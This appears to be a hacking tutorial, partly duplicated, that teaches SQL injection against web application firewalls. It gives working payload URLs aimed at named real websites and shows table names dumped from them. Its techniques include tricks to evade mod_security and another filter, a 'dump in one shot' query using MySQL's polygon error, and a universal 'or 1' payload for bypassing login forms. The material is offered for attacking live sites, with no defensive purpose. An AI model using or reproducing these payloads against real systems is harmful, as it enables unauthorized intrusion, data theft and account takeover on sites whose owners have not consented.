In the recent days, i get a lot of waf bypass requests, which the regular methods (/* , #\n , url-encoding etc) dont work on them.
so today i will write about some new methods to handle these kinda sites, and some other new stuff.
this time there will be no pics in this paper, only text.
TOC
- waf bypass (\N , e , {})
- DIOS in non-geometric error based
- ABIOS
waf bypass
up to now, if we saw error like "403 forbbiden", we didnt take it much seriously.
we just used one of the known bypass methods, and owned the website.
but recently, the wafs are getting smarter and harder. but so do i
we will use this site for demonstrate-
i counted the columns using group by, and there are 16.
so our query looks like that-
"Not Acceptable! This error was generated by Mod_Security."
seems like mod_security is on.
how can we bypass modsecurity? usually /*!50000union*/ and distinct are doing the trick.
no more mod_security, but now we got another waf.
thats the first trick i wanna show you today.
as we can see, 'union' is being blocked.
but how strongly?
lets do some tests.
403, union gets block.
so maybe the 'e' trick will do?
403, still blocked.
no 403, union not blocked.
but how can we stick a letter to union, and not get 1064?
we can so that by use \N.
\N is case sensetive for NULL.
lets try-
bypassed, column #10 on the screen.
lets try to get the version.
403 again.
seems like we cant directly put version() in the column.
thats the second trick i wanna show you.
usually, we would do something like (version()), but seems its also covered here.
in mysql, theres something called "timestamp".
basically, its defines the type of the string, like-
the cool thing about it, its we can write it like that-
so we can use that to bypass wafs, like that-
boom, 5.5.40-36.1 .
another thing i want to talk about today, is getting tables.
so lets try to get tables.
403, waf blocks from.
lets try to stick a number to it.
no waf.
usually to stick a number to "from", we use 'e'. its forbbiden here, but theres another method.
we can simply put dot before the number, and write anything after without space.
its like 0.16 .
so in our injection-
no waf.
now when we srite "from information_schema.tables", we get modsecurity error.
remember the timestamp thing? we can also do that with tables, so-
modsecurity - bypassed.
403 - not yet.
as we can see, the combination of "schema.tables" is blocked. the usual ``,+,() not working, so we gotta think outside the box.
we can mess with the query parser using 'e' again.
when the webserver parsing the query, it use db.table.column format.
in sql, information_schema 9.e.tables = information_schema.tables.
so-
now for the table_name part.
as before, we cant just write the column instead of column #10, so we gotta be creative.
just like information_schema bypass, we can also use 'e' to mess with the parser with the columns.
in columns, it goes like that-
``0.e.table_name = table_name, so-
bypassed.
DIOS in non-geometric error based
something i also saw recently, is people trying to make dios in polygon.
the problem of doing that, is unlike union, polygon is limited by the result , so we gotta "be cheap" to save space.
even though the result is limited, its still larger than other error based outputs.
the original dios query is this-
p.s i remember when denjacker showed me that 3 years ago, i was absolutley amazed to see how far people can get, only by use a simple variable.
lets go back to the tut.
we will use this site to demonstrate-
lets check if we can use polygon.
Qusers - Error #1367: Illegal non geometric '(select `p`.`@@version` from (select '5.1.73-log' AS `@@version` from (select @@version AS `@@version`) `k`) `p`)' value found during parsing
yes, we can.
but as we can see, the output is very large, our dios will never fit in.
the red part is the alias, which take a lot of space.
lets try to save space, by give @@version a shorter alias, like 'a'.
Qusers - Error #1367: Illegal non geometric '(select `p`.`a` from (select '5.1.73-log' AS `a` from (select a AS `a`) `k`) `p`)' value found during parsing
shorter indeed.
but can we reduce more?
lets try give @@version an empty alias.
Qusers - Error #1367: Illegal non geometric '(select `` from (select '5.1.73-log' AS `` from (select AS ``) `k`) `p`)' value found during parsing
thats more like it.
now lets try to put the dios syntax in our query.
Qusers - Error #1367: Illegal non geometric '(select `p`.`(@)` from (select '' value found during parsing
blank output.
the 0x00 gets convert to real null byte, which "delete" our output.
lets replace it by 0x01.
Qusers - Error #1367: Illegal non geometric '(select `p`.`(@)` from (select ' : blocklist : log_login : pernodmajorwinners : pernodmanagement : pernodmatches : pernodmessages : pernodnews : pernodpolls : pernodtopics : pernoduser' AS `(' value found during parsing
lets get rid off the unnecessary things, and as before, give our output an empty alias-
Qusers - Error #1367: Illegal non geometric '(select `` from (select ' : blocklist : log_login : pernodmajorwinners : pernodmanagement : pernodmatches : pernodmessages : pernodnews : pernodpolls : pernodtopics : pernoduser' AS `` from (' value found during parsing
and we got DIOS for non-geometric error based.
Auth Bypass In One Shot
sometimes we need to bypass some admin panels, and we do that using or 1=1.
the problem is we dont know if we gotta use integer, one-quote string or double-quote string.
but is it really matter?
lets check this query-
lets check any term of the above.
if its integer, the url behind the query + our injection is like that-
SELECT * FROM login WHERE id=1 or 1-- -' or 1 or '1"or 1 or" AND username='' AND password=''
the "or 1-- -" gets active, make the condition true and ignores the rest of the query.
now lets check regular string-
SELECT * FROM login WHERE username=' or 1-- -' or 1 or '1"or 1 or" ' .....
the "or 1" part make the query true, and the other parts are considered as the comparison strings.
same with the double quotes.
SELECT * FROM login WHERE username=" or 1-- -' or 1 or '1"or 1 or" " .....
wafs will always get tricky, the sqli section will continue to grow, and the human brain will provide more and more with less and less.
thats my conclusion.
hope you learned something
so today i will write about some new methods to handle these kinda sites, and some other new stuff.
this time there will be no pics in this paper, only text.
TOC
- waf bypass (\N , e , {})
- DIOS in non-geometric error based
- ABIOS
waf bypass
up to now, if we saw error like "403 forbbiden", we didnt take it much seriously.
we just used one of the known bypass methods, and owned the website.
but recently, the wafs are getting smarter and harder. but so do i
we will use this site for demonstrate-
Code:
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=78
i counted the columns using group by, and there are 16.
so our query looks like that-
Code:
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=-16 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
"Not Acceptable! This error was generated by Mod_Security."
seems like mod_security is on.
how can we bypass modsecurity? usually /*!50000union*/ and distinct are doing the trick.
Code:
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=-16 /*!50000union*/ distinct select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16-- -
no more mod_security, but now we got another waf.
thats the first trick i wanna show you today.
as we can see, 'union' is being blocked.
but how strongly?
lets do some tests.
Code:
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=16 union
so maybe the 'e' trick will do?
Code:
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=16e0union
Code:
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=aunion
but how can we stick a letter to union, and not get 1064?
we can so that by use \N.
\N is case sensetive for NULL.
lets try-
Code:
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=\Nunion distinct select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--
lets try to get the version.
Code:
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=\Nunion distinct select 1,2,3,4,5,6,7,8,9,version(),11,12,13,14,15,16--
seems like we cant directly put version() in the column.
thats the second trick i wanna show you.
usually, we would do something like (version()), but seems its also covered here.
in mysql, theres something called "timestamp".
basically, its defines the type of the string, like-
Code:
SELECT TIMESTAMP 'str';
the cool thing about it, its we can write it like that-
Code:
SELECT { ts column};
so we can use that to bypass wafs, like that-
Code:
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=\Nunion distinct select 1,2,3,4,5,6,7,8,9,{f version()},11,12,13,14,15,16--
another thing i want to talk about today, is getting tables.
so lets try to get tables.
Code:
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=\Nunion distinct select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 from--
lets try to stick a number to it.
Code:
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=\Nunion distinct select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16from--
usually to stick a number to "from", we use 'e'. its forbbiden here, but theres another method.
we can simply put dot before the number, and write anything after without space.
its like 0.16 .
so in our injection-
Code:
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=\Nunion distinct select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,.16from sometable--
now when we srite "from information_schema.tables", we get modsecurity error.
remember the timestamp thing? we can also do that with tables, so-
Code:
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=\Nunion distinct select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,.16from {f information_schema.tables}--
403 - not yet.
as we can see, the combination of "schema.tables" is blocked. the usual ``,+,() not working, so we gotta think outside the box.
we can mess with the query parser using 'e' again.
when the webserver parsing the query, it use db.table.column format.
in sql, information_schema 9.e.tables = information_schema.tables.
so-
Code:
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=\Nunion distinct select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,.16from {f information_schema 0.e.tables}--
as before, we cant just write the column instead of column #10, so we gotta be creative.
just like information_schema bypass, we can also use 'e' to mess with the parser with the columns.
in columns, it goes like that-
``0.e.table_name = table_name, so-
Code:
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=\Nunion distinct select 1,2,3,4,5,6,7,8,9,``0.e.table_name,11,12,13,14,15,.16from {f information_schema 0.e.tables}--
DIOS in non-geometric error based
something i also saw recently, is people trying to make dios in polygon.
the problem of doing that, is unlike union, polygon is limited by the result , so we gotta "be cheap" to save space.
even though the result is limited, its still larger than other error based outputs.
the original dios query is this-
Code:
(select (@) from (select(@:=0x00),(select (@) from (information_schema.tables) where (table_schema>=@)and (table_schema<>0x696e666f726d6174696f6e5f736368656d61)and (@)in (@:=concat(@,0x0a,table_name))))x)
lets go back to the tut.
we will use this site to demonstrate-
Code:
http://www.thepernodship.co.uk/users/view.php?id=1
lets check if we can use polygon.
Code:
http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select@@version)k)p))
yes, we can.
but as we can see, the output is very large, our dios will never fit in.
the red part is the alias, which take a lot of space.
lets try to save space, by give @@version a shorter alias, like 'a'.
Code:
http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select@@version a)k)p))
shorter indeed.
but can we reduce more?
lets try give @@version an empty alias.
Code:
http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select@@version``)k)p))
thats more like it.
now lets try to put the dios syntax in our query.
Code:
http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from((select (@) from (select(@:=0x00),(select (@) from (information_schema.tables) where (table_schema>=@)and (table_schema<>0x696e666f726d6174696f6e5f736368656d61)and (@)in (@:=concat(@,0x0a,table_name))))x))k)p))
blank output.
the 0x00 gets convert to real null byte, which "delete" our output.
lets replace it by 0x01.
Code:
http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from((select (@) from (select(@:=0),(select (@) from (information_schema.tables) where (table_schema>=@)and (table_schema<>0x696e666f726d6174696f6e5f736368656d61)and (@)in (@:=concat(@,0x203a20,table_name))))x))k)p))
lets get rid off the unnecessary things, and as before, give our output an empty alias-
Code:
http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select((select@''from(select@:=0x01,(select@ from information_schema.tables where table_schema!='information_schema'and@:=concat(@,0x203a20,table_name)))p))'')f)x))
and we got DIOS for non-geometric error based.
Auth Bypass In One Shot
sometimes we need to bypass some admin panels, and we do that using or 1=1.
the problem is we dont know if we gotta use integer, one-quote string or double-quote string.
but is it really matter?
lets check this query-
Code:
or 1-- -' or 1 or '1"or 1 or"
if its integer, the url behind the query + our injection is like that-
SELECT * FROM login WHERE id=1 or 1-- -' or 1 or '1"or 1 or" AND username='' AND password=''
the "or 1-- -" gets active, make the condition true and ignores the rest of the query.
now lets check regular string-
SELECT * FROM login WHERE username=' or 1-- -' or 1 or '1"or 1 or" ' .....
the "or 1" part make the query true, and the other parts are considered as the comparison strings.
same with the double quotes.
SELECT * FROM login WHERE username=" or 1-- -' or 1 or '1"or 1 or" " .....
wafs will always get tricky, the sqli section will continue to grow, and the human brain will provide more and more with less and less.
thats my conclusion.
hope you learned something
Thanks for ThAt:3
ReplyDeletePost a Comment